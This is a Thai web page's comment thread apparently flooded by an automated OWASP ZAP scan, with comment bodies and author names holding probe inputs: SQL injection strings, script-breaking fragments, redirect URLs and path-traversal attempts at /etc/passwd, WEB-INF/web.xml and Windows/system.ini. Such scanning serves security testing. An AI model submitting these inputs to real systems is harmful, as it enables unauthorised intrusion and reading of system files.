แสดงความคิดเห็น 175 (ชือผู้ตอบ ZAP)
' OR '1'='1' --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 176 (ชือผู้ตอบ ZAP)
' AND '1'='2' --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 177 (ชือผู้ตอบ ZAP)
' AND '1'='1' --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 178 (ชือผู้ตอบ ZAP)
OR 1=1 --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 179 (ชือผู้ตอบ ZAP)
AND 1=2 --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 180 (ชือผู้ตอบ ZAP)
OR 1=1 --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 181 (ชือผู้ตอบ ZAP)
AND 1=2 --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 182 (ชือผู้ตอบ ZAP)
AND 1=1 --

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 183 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 184 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 185 (ชือผู้ตอบ ZAP)
)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 186 (ชือผู้ตอบ ZAP)
)

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 187 (ชือผู้ตอบ ZAP)
;

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 188 (ชือผู้ตอบ ZAP)
;

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 189 (ชือผู้ตอบ ZAP)
"

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 190 (ชือผู้ตอบ ZAP)
"

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 191 (ชือผู้ตอบ ZAP)
'

 

สร้างเมื่อ 2020-10-22 04:04:33
แสดงความคิดเห็น 192 (ชือผู้ตอบ ZAP)
'

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 193 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 194 (ชือผู้ตอบ ZAP') UNION ALL Select NULL -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 195 (ชือผู้ตอบ ZAP) UNION ALL Select NULL -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 196 (ชือผู้ตอบ ZAP" UNION ALL Select NULL -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 197 (ชือผู้ตอบ ZAP' UNION ALL Select NULL -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 198 (ชือผู้ตอบ ZAP UNION ALL Select NULL -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 199 (ชือผู้ตอบ ZAP' OR '1'='1' -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 200 (ชือผู้ตอบ ZAP' AND '1'='2' -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 201 (ชือผู้ตอบ ZAP' OR '1'='1' -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 202 (ชือผู้ตอบ ZAP' AND '1'='2' -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 203 (ชือผู้ตอบ ZAP' AND '1'='1' -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 204 (ชือผู้ตอบ ZAP OR 1=1 -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 205 (ชือผู้ตอบ ZAP AND 1=2 -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 206 (ชือผู้ตอบ ZAP OR 1=1 -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 207 (ชือผู้ตอบ ZAP AND 1=2 -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 208 (ชือผู้ตอบ ZAP AND 1=1 -- )

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 209 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 210 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 211 (ชือผู้ตอบ ZAP))

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 212 (ชือผู้ตอบ ))

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 213 (ชือผู้ตอบ ZAP;)

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 214 (ชือผู้ตอบ ;)

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 215 (ชือผู้ตอบ ZAP")

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 216 (ชือผู้ตอบ ")

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 217 (ชือผู้ตอบ ZAP')

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 218 (ชือผู้ตอบ ')

 

สร้างเมื่อ 2020-10-22 04:04:32
แสดงความคิดเห็น 219 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 03:51:18
แสดงความคิดเห็น 220 (ชือผู้ตอบ ZAP)
zApPX54sS

 

สร้างเมื่อ 2020-10-22 03:45:24
แสดงความคิดเห็น 221 (ชือผู้ตอบ ZApPX53sS)

 

สร้างเมื่อ 2020-10-22 03:45:24
แสดงความคิดเห็น 222 (ชือผู้ตอบ ZAP)
'"

 

สร้างเมื่อ 2020-10-22 03:42:20
แสดงความคิดเห็น 223 (ชือผู้ตอบ ZAP)
'"

 

สร้างเมื่อ 2020-10-22 03:42:20
แสดงความคิดเห็น 224 (ชือผู้ตอบ ZAP)
0W45pz4p

 

สร้างเมื่อ 2020-10-22 03:42:20
แสดงความคิดเห็น 225 (ชือผู้ตอบ ZAP)
0W45pz4p

 

สร้างเมื่อ 2020-10-22 03:42:20
แสดงความคิดเห็น 226 (ชือผู้ตอบ '")

 

สร้างเมื่อ 2020-10-22 03:42:20
แสดงความคิดเห็น 227 (ชือผู้ตอบ '")

 

สร้างเมื่อ 2020-10-22 03:42:20
แสดงความคิดเห็น 228 (ชือผู้ตอบ ZAP0W45pz4p)

 

สร้างเมื่อ 2020-10-22 03:42:20
แสดงความคิดเห็น 229 (ชือผู้ตอบ 0W45pz4p)

 

สร้างเมื่อ 2020-10-22 03:42:20
แสดงความคิดเห็น 230 (ชือผู้ตอบ ZAP)
"><

 

สร้างเมื่อ 2020-10-22 03:38:45
แสดงความคิดเห็น 231 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 03:38:45
แสดงความคิดเห็น 232 (ชือผู้ตอบ ZAP)
"><

 

สร้างเมื่อ 2020-10-22 03:38:45
แสดงความคิดเห็น 233 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 03:38:45
แสดงความคิดเห็น 234 (ชือผู้ตอบ "><)

 

สร้างเมื่อ 2020-10-22 03:38:45
แสดงความคิดเห็น 235 (ชือผู้ตอบ )

 

สร้างเมื่อ 2020-10-22 03:38:45
แสดงความคิดเห็น 236 (ชือผู้ตอบ "><)

 

สร้างเมื่อ 2020-10-22 03:38:45
แสดงความคิดเห็น 237 (ชือผู้ตอบ )

 

สร้างเมื่อ 2020-10-22 03:38:45
แสดงความคิดเห็น 238 (ชือผู้ตอบ ZAP)
HtTpS://5628945873949837821.owasp.org

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 239 (ชือผู้ตอบ ZAP)
HtTp://5628945873949837821.owasp.org

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 240 (ชือผู้ตอบ ZAP)
\\5628945873949837821.owasp.org

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 241 (ชือผู้ตอบ ZAP)
//5628945873949837821.owasp.org

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 242 (ชือผู้ตอบ ZAP)
https:\\5628945873949837821.owasp.org

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 243 (ชือผู้ตอบ ZAP)
http:\\5628945873949837821.owasp.org

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 244 (ชือผู้ตอบ ZAP)
https://5628945873949837821.owasp.org

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 245 (ชือผู้ตอบ ZAP)
http://5628945873949837821.owasp.org

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 246 (ชือผู้ตอบ ZAP)
5628945873949837821.owasp.org

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 247 (ชือผู้ตอบ HtTpS://5628945873949837821.owasp.org)

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 248 (ชือผู้ตอบ HtTp://5628945873949837821.owasp.org)

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 249 (ชือผู้ตอบ \\5628945873949837821.owasp.org)

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 250 (ชือผู้ตอบ //5628945873949837821.owasp.org)

 

สร้างเมื่อ 2020-10-22 03:35:18
แสดงความคิดเห็น 251 (ชือผู้ตอบ Https:\\5628945873949837821.owasp.org)

 

สร้างเมื่อ 2020-10-22 03:35:17
แสดงความคิดเห็น 252 (ชือผู้ตอบ Http:\\5628945873949837821.owasp.org)

 

สร้างเมื่อ 2020-10-22 03:35:17
แสดงความคิดเห็น 253 (ชือผู้ตอบ Https://5628945873949837821.owasp.org)

 

สร้างเมื่อ 2020-10-22 03:35:17
แสดงความคิดเห็น 254 (ชือผู้ตอบ Http://5628945873949837821.owasp.org)

 

สร้างเมื่อ 2020-10-22 03:35:17
แสดงความคิดเห็น 255 (ชือผู้ตอบ 5628945873949837821.owasp.org)

 

สร้างเมื่อ 2020-10-22 03:35:17
แสดงความคิดเห็น 256 (ชือผู้ตอบ ZAP)
www.google.com:80/search?q=OWASP%20ZAP

 

สร้างเมื่อ 2020-10-22 03:31:44
แสดงความคิดเห็น 257 (ชือผู้ตอบ ZAP)
www.google.com/search?q=OWASP%20ZAP

 

สร้างเมื่อ 2020-10-22 03:31:44
แสดงความคิดเห็น 258 (ชือผู้ตอบ ZAP)
www.google.com

 

สร้างเมื่อ 2020-10-22 03:31:44
แสดงความคิดเห็น 259 (ชือผู้ตอบ ZAP)
www.google.com:80/

 

สร้างเมื่อ 2020-10-22 03:31:44
แสดงความคิดเห็น 260 (ชือผู้ตอบ ZAP)
www.google.com/

 

สร้างเมื่อ 2020-10-22 03:31:44
แสดงความคิดเห็น 261 (ชือผู้ตอบ ZAP)
http://www.google.com:80/search?q=OWASP%20ZAP

 

สร้างเมื่อ 2020-10-22 03:31:44
แสดงความคิดเห็น 262 (ชือผู้ตอบ ZAP)
http://www.google.com/search?q=OWASP%20ZAP

 

สร้างเมื่อ 2020-10-22 03:31:44
แสดงความคิดเห็น 263 (ชือผู้ตอบ ZAP)
http://www.google.com

 

สร้างเมื่อ 2020-10-22 03:31:44
แสดงความคิดเห็น 264 (ชือผู้ตอบ ZAP)
http://www.google.com:80/

 

สร้างเมื่อ 2020-10-22 03:31:44
แสดงความคิดเห็น 265 (ชือผู้ตอบ ZAP)
http://www.google.com/

 

สร้างเมื่อ 2020-10-22 03:31:44
แสดงความคิดเห็น 266 (ชือผู้ตอบ Www.google.com:80/search?q=OWASP%20ZAP)

 

สร้างเมื่อ 2020-10-22 03:31:43
แสดงความคิดเห็น 267 (ชือผู้ตอบ Www.google.com/search?q=OWASP%20ZAP)

 

สร้างเมื่อ 2020-10-22 03:31:43
แสดงความคิดเห็น 268 (ชือผู้ตอบ Www.google.com)

 

สร้างเมื่อ 2020-10-22 03:31:43
แสดงความคิดเห็น 269 (ชือผู้ตอบ Www.google.com:80/)

 

สร้างเมื่อ 2020-10-22 03:31:43
แสดงความคิดเห็น 270 (ชือผู้ตอบ Www.google.com/)

 

สร้างเมื่อ 2020-10-22 03:31:43
แสดงความคิดเห็น 271 (ชือผู้ตอบ Http://www.google.com:80/search?q=OWASP%20ZAP)

 

สร้างเมื่อ 2020-10-22 03:31:43
แสดงความคิดเห็น 272 (ชือผู้ตอบ Http://www.google.com/search?q=OWASP%20ZAP)

 

สร้างเมื่อ 2020-10-22 03:31:43
แสดงความคิดเห็น 273 (ชือผู้ตอบ Http://www.google.com)

 

สร้างเมื่อ 2020-10-22 03:31:43
แสดงความคิดเห็น 274 (ชือผู้ตอบ Http://www.google.com:80/)

 

สร้างเมื่อ 2020-10-22 03:31:43
แสดงความคิดเห็น 275 (ชือผู้ตอบ Http://www.google.com/)

 

สร้างเมื่อ 2020-10-22 03:31:43
แสดงความคิดเห็น 276 (ชือผู้ตอบ ZAP)
thishouldnotexistandhopefullyitwillnot

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 277 (ชือผู้ตอบ ZAP)
\WEB-INF\web.xml

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 278 (ชือผู้ตอบ ZAP)
/WEB-INF/web.xml

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 279 (ชือผู้ตอบ ZAP)
WEB-INF\web.xml

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 280 (ชือผู้ตอบ ZAP)
WEB-INF/web.xml

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 281 (ชือผู้ตอบ ZAP)
../../../../../../../../../../../../../../../../

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 282 (ชือผู้ตอบ ZAP)
c:\

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 283 (ชือผู้ตอบ ZAP)
/

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 284 (ชือผู้ตอบ ZAP)
c:/

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 285 (ชือผู้ตอบ ZAP)
../../../../../../../../../../../../../../../../etc/passwd

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 286 (ชือผู้ตอบ ZAP)
/etc/passwd

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 287 (ชือผู้ตอบ ZAP)
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 288 (ชือผู้ตอบ ZAP)
c:\Windows\system.ini

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 289 (ชือผู้ตอบ ZAP)
../../../../../../../../../../../../../../../../Windows/system.ini

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 290 (ชือผู้ตอบ ZAP)
c:/Windows/system.ini

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 291 (ชือผู้ตอบ Thishouldnotexistandhopefullyitwillnot)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 292 (ชือผู้ตอบ \WEB-INF\web.xml)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 293 (ชือผู้ตอบ /WEB-INF/web.xml)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 294 (ชือผู้ตอบ WEB-INF\web.xml)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 295 (ชือผู้ตอบ WEB-INF/web.xml)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 296 (ชือผู้ตอบ ../../../../../../../../../../../../../../../../)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 297 (ชือผู้ตอบ C:\)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 298 (ชือผู้ตอบ /)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 299 (ชือผู้ตอบ C:/)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 300 (ชือผู้ตอบ ../../../../../../../../../../../../../../../../etc/passwd)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 301 (ชือผู้ตอบ /etc/passwd)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 302 (ชือผู้ตอบ ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 303 (ชือผู้ตอบ C:\Windows\system.ini)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 304 (ชือผู้ตอบ ../../../../../../../../../../../../../../../../Windows/system.ini)

 

สร้างเมื่อ 2020-10-22 03:27:48
แสดงความคิดเห็น 305 (ชือผู้ตอบ C:/Windows/system.ini)

 

สร้างเมื่อ 2020-10-22 03:27:47
แสดงความคิดเห็น 306 (ชือผู้ตอบ ZAP)

 

สร้างเมื่อ 2020-10-22 03:23:49
แสดงความคิดเห็น